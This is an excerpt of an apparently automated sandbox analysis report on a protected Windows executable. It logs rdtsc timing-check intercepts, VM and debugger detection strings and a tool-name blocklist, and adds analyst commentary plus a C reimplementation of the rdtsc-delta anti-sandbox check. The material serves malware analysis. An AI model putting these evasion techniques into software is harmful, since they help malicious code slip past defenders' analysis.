Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160F9E second address: 7161032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E91C5460h 0x00000009 add cl, FFFFFF98h 0x0000000c jmp 00007F43E91C545Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F43E91C5468h 0x00000018 jmp 00007F43E91C5465h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 pushad 0x00000025 movzx ecx, bx 0x00000028 mov di, D16Ch 0x0000002c popad 0x0000002d mov dword ptr [edx+10h], eax 0x00000030 jmp 00007F43E91C545Bh 0x00000035 mov eax, dword ptr [esi+14h] 0x00000038 pushad 0x00000039 mov di, si 0x0000003c push ecx 0x0000003d pushad 0x0000003e popad 0x0000003f pop edi 0x00000040 popad 0x00000041 mov dword ptr [edx+14h], eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F43E91C5462h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161032 second address: 7161041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161041 second address: 7161047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161047 second address: 716111B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f jmp 00007F43E8C1FDE9h 0x00000014 popad 0x00000015 mov dword ptr [edx+18h], eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F43E8C1FDDCh 0x0000001f xor si, 7EA8h 0x00000024 jmp 00007F43E8C1FDDBh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F43E8C1FDE8h 0x00000030 xor cl, 00000008h 0x00000033 jmp 00007F43E8C1FDDBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov eax, dword ptr [esi+1Ch] 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F43E8C1FDE4h 0x00000044 jmp 00007F43E8C1FDE5h 0x00000049 popfd 0x0000004a mov ebx, esi 0x0000004c popad 0x0000004d mov dword ptr [edx+1Ch], eax 0x00000050 jmp 00007F43E8C1FDDAh 0x00000055 mov eax, dword ptr [esi+20h] 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F43E8C1FDDDh 0x00000061 jmp 00007F43E8C1FDDBh 0x00000066 popfd 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716111B second address: 7161121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161121 second address: 716118B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 pushfd 0x00000012 jmp 00007F43E8C1FDDAh 0x00000017 sub al, FFFFFF88h 0x0000001a jmp 00007F43E8C1FDDBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+24h] 0x00000024 jmp 00007F43E8C1FDE6h 0x00000029 mov dword ptr [edx+24h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F43E8C1FDE7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716118B second address: 7161191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161191 second address: 7161195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161195 second address: 7161199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161199 second address: 716120A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 mov dword ptr [edx+28h], eax 0x00000016 pushad 0x00000017 mov dx, E342h 0x0000001b pushfd 0x0000001c jmp 00007F43E8C1FDE3h 0x00000021 or ax, DA3Eh 0x00000026 jmp 00007F43E8C1FDE9h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ecx, dword ptr [esi+2Ch] 0x00000030 jmp 00007F43E8C1FDDEh 0x00000035 mov dword ptr [edx+2Ch], ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F43E8C1FDDAh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 716120A second address: 716120E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 716120E second address: 7161214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161214 second address: 7161241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E91C545Ch 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [esi+30h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F43E91C5463h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161241 second address: 7161259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161259 second address: 716126B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, dx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 716126B second address: 7161283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov bx, cx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161283 second address: 7161287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161287 second address: 7161295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161295 second address: 71612CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007F43E91C5465h 0x0000000e or ax, 6CA6h 0x00000013 jmp 00007F43E91C5461h 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71612CA second address: 71612F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov word ptr [edx+32h], ax 0x00000009 jmp 00007F43E8C1FDDDh 0x0000000e mov eax, dword ptr [esi+34h] 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 mov dword ptr [edx+34h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f movsx ebx, ax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71612F4 second address: 7161333 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 61909CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F43E91C5464h 0x0000000f jmp 00007F43E91C5465h 0x00000014 popfd 0x00000015 popad 0x00000016 test ecx, 00000700h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 7161333 second address: 71613A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E8C1FDE0h 0x00000009 sub ecx, 007EB968h 0x0000000f jmp 00007F43E8C1FDDBh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007F4458F9E18Fh 0x00000020 pushad 0x00000021 mov cx, 1CF1h 0x00000025 pushfd 0x00000026 jmp 00007F43E8C1FDDEh 0x0000002b xor ax, 0BC8h 0x00000030 jmp 00007F43E8C1FDDBh 0x00000035 popfd 0x00000036 popad 0x00000037 or dword ptr [edx+38h], FFFFFFFFh 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F43E8C1FDE0h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613A2 second address: 71613B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613B1 second address: 71613B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613B7 second address: 71613BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613BB second address: 71613BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613BF second address: 71613D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613D1 second address: 71613D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613D5 second address: 71613D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613D9 second address: 71613DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613DF second address: 71613F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71613F1 second address: 716141B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F43E8C1FDE8h 0x00000014 push eax 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 716141B second address: 7161464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E91C545Dh 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 pushfd 0x00000015 jmp 00007F43E91C545Bh 0x0000001a add ecx, 1D35478Eh 0x00000020 jmp 00007F43E91C5469h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71B0A2F second address: 71B0A5E instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebp 0x00000009 jmp 00007F43E8C1FDDAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F43E8C1FDE7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71B0A5E second address: 71B0A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43E91C545Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 70F05C4 second address: 70F05D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 70F05D3 second address: 70F05D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 70F05D7 second address: 70F0616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F43E8C1FDE4h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, bx 0x00000015 call 00007F43E8C1FDE9h 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 70F09E8 second address: 70F09F2 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov ah, E7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71408D6 second address: 71408F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: 71408F3 second address: 714097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E91C5467h 0x00000009 adc si, BB2Eh 0x0000000e jmp 00007F43E91C5469h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F43E91C5460h 0x0000001a sbb esi, 3CD910A8h 0x00000020 jmp 00007F43E91C545Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F43E91C5466h 0x0000002f push eax 0x00000030 jmp 00007F43E91C545Bh 0x00000035 xchg eax, ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dh, 4Bh 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Special instruction interceptor: First address: C8B250 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Special instruction interceptor: First address: C9BA06 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Special instruction interceptor: First address: D0F926 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Code function: 0_2_006B9980 rdtsc 0_2_006B9980
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | TID: 7536 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Code function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Code function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: Cc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Cc8zEnIDB2.exe, 00000000.00000003.1338130046.0000000001882000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!!=
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Cc8zEnIDB2.exe | Binary or memory string: Hyper-V RAW
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Cc8zEnIDB2.exe, 00000000.00000003.1340021481.00000000069E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlU9
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Cc8zEnIDB2.exe, 00000000.00000003.1386073978.00000000072D1000.00000004.00000020.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1398201242.0000000007340000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Reading these strings: the "Hyper-V RAW" / mswsock.dll entries are the name of the Hyper-V Sockets Winsock provider that ships in mswsock.dll on every Windows 10 install, not evidence that the sample tests for Hyper-V; the heuristic keys on the word only. The Oreans.vxd and Software\WinLicense strings are the Oreans WinLicense/Themida protector, which accounts for the VBOX__ ACPI check, the self-modifying code and the rdtsc pairs above. The run of field names in the 0x980000 region (Num_processor, Num_ram, resolution_x, recent_files, processes, uptime_minutes, vbox_first, vbox_second, public_check, dbg, dbg_sec, dbg_third, installed_apps) reads as the record layout of the host fingerprint the payload assembles from the registry, process, drive and Uninstall-key queries listed in this section; WINDBG.EXE, wireshark.exe, procmon.exe, x64dbg.exe and ida.exe are its process-name blocklist.
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Process information queried: ProcessInformation
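Each of the 32 "RDTSC instruction interceptor" entries above records one pair of consecutive rdtsc reads that the sandbox trapped, with the instructions executed between them; the pushad/pushfd/jmp padding around the actual work (copying a structure from esi to edx) is protector-generated junk. What the sample measures is the classic time-stamp-counter delta: two nearby reads cost a few dozen cycles on bare metal but hundreds or thousands when rdtsc is trapped, single-stepped or emulated, so the sandbox has to hand back plausible values instead of the real ones. The block below is an added example, not code from the report or from the sample, that reimplements the check so an analyst can see exactly what an interceptor must fake; the 500-cycle threshold, the sample count and the two constructed tick arrays are assumptions, and the non-x86 fallback only exists so the block builds everywhere.

```c
/* Added example (not from the Joe Sandbox report or the sample): the rdtsc
 * delta check flagged above, reimplemented to show what it measures and what
 * a sandbox interceptor has to return to defeat it. */
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
#  if defined(_MSC_VER)
#    include <intrin.h>
#  else
#    include <x86intrin.h>
#  endif
static uint64_t read_tsc(void) { return __rdtsc(); }
#else
/* Assumption for non-x86 hosts: clock() keeps the block compiling, but the
 * cycle threshold below is meaningless for this source. */
static uint64_t read_tsc(void) { return (uint64_t)clock(); }
#endif

/* Threshold is an assumption; real samples tune it per CPU generation. A native
 * rdtsc pair is tens of cycles; a trapped or emulated one is hundreds or more. */
#define RDTSC_THRESHOLD 500u
#define MAX_PAIRS 1024u

/* Minimum delta over npairs (t0, t1) readings. The minimum, not the mean, is
 * what the check wants: interrupts and scheduling inflate individual samples,
 * but nothing can make a pair look faster than the hardware allows. */
static uint64_t min_delta_of(const uint64_t *pairs, size_t npairs) {
    uint64_t best = UINT64_MAX;
    for (size_t i = 0; i < npairs; i++) {
        uint64_t d = pairs[2 * i + 1] - pairs[2 * i];
        if (d < best) best = d;
    }
    return best;
}

/* The decision as the sample makes it. A VMX guest with plain TSC offsetting
 * passes (rdtsc does not exit unless the hypervisor asks for it), which is why
 * sandboxes rewrite the returned values instead of relying on the CPU. */
static int looks_instrumented(uint64_t min_delta, uint64_t threshold) {
    return min_delta > threshold;
}

/* Live measurement: back-to-back reads, then the reduction above. */
static uint64_t min_tsc_delta(unsigned samples) {
    uint64_t buf[2 * MAX_PAIRS];
    if (samples > MAX_PAIRS) samples = MAX_PAIRS;
    for (unsigned i = 0; i < samples; i++) {
        buf[2 * i] = read_tsc();
        buf[2 * i + 1] = read_tsc();
    }
    return min_delta_of(buf, samples);
}

/* Constructed tick pairs (not captured from the sample): what bare metal
 * returns, and what a trapping monitor returns before an interceptor rewrites
 * the values into something that passes. */
static const uint64_t kNativePairs[]  = { 1000, 1024, 2000, 2032, 3000, 3026, 4000, 4080 };
static const uint64_t kTrappedPairs[] = { 1000, 1900, 2000, 3200, 4000, 4850, 6000, 7100 };

int main(void) {
    uint64_t native = min_delta_of(kNativePairs, 4);
    uint64_t trapped = min_delta_of(kTrappedPairs, 4);
    uint64_t live = min_tsc_delta(1000);
    printf("constructed native pairs:  min delta %llu, instrumented=%d\n",
           (unsigned long long)native, looks_instrumented(native, RDTSC_THRESHOLD));
    printf("constructed trapped pairs: min delta %llu, instrumented=%d\n",
           (unsigned long long)trapped, looks_instrumented(trapped, RDTSC_THRESHOLD));
    printf("live, 1000 pairs:          min delta %llu, instrumented=%d\n",
           (unsigned long long)live, looks_instrumented(live, RDTSC_THRESHOLD));
    return 0;
}
```

Run it natively and under the analysis VM you use: if the live minimum jumps by an order of magnitude inside the VM, that environment will trip this check unless rdtsc is intercepted the way the entries above show. Single-stepping the sample through either read in a debugger has the same effect, which is the other reason the protector sprinkles the pairs through ordinary code.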

Anti Debugging

Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Code function: 0_2_071903E6 Start: 07190B90 End: 07190457 0_2_071903E6
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | File opened: NTICE
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | File opened: SICE
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Process queried: DebugPort (three times)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Code function: 0_2_006B9980 rdtsc 0_2_006B9980
Source: Cc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ^Program Manager (the title of the Progman desktop window; its absence marks a session with no interactive desktop)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (three times)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe
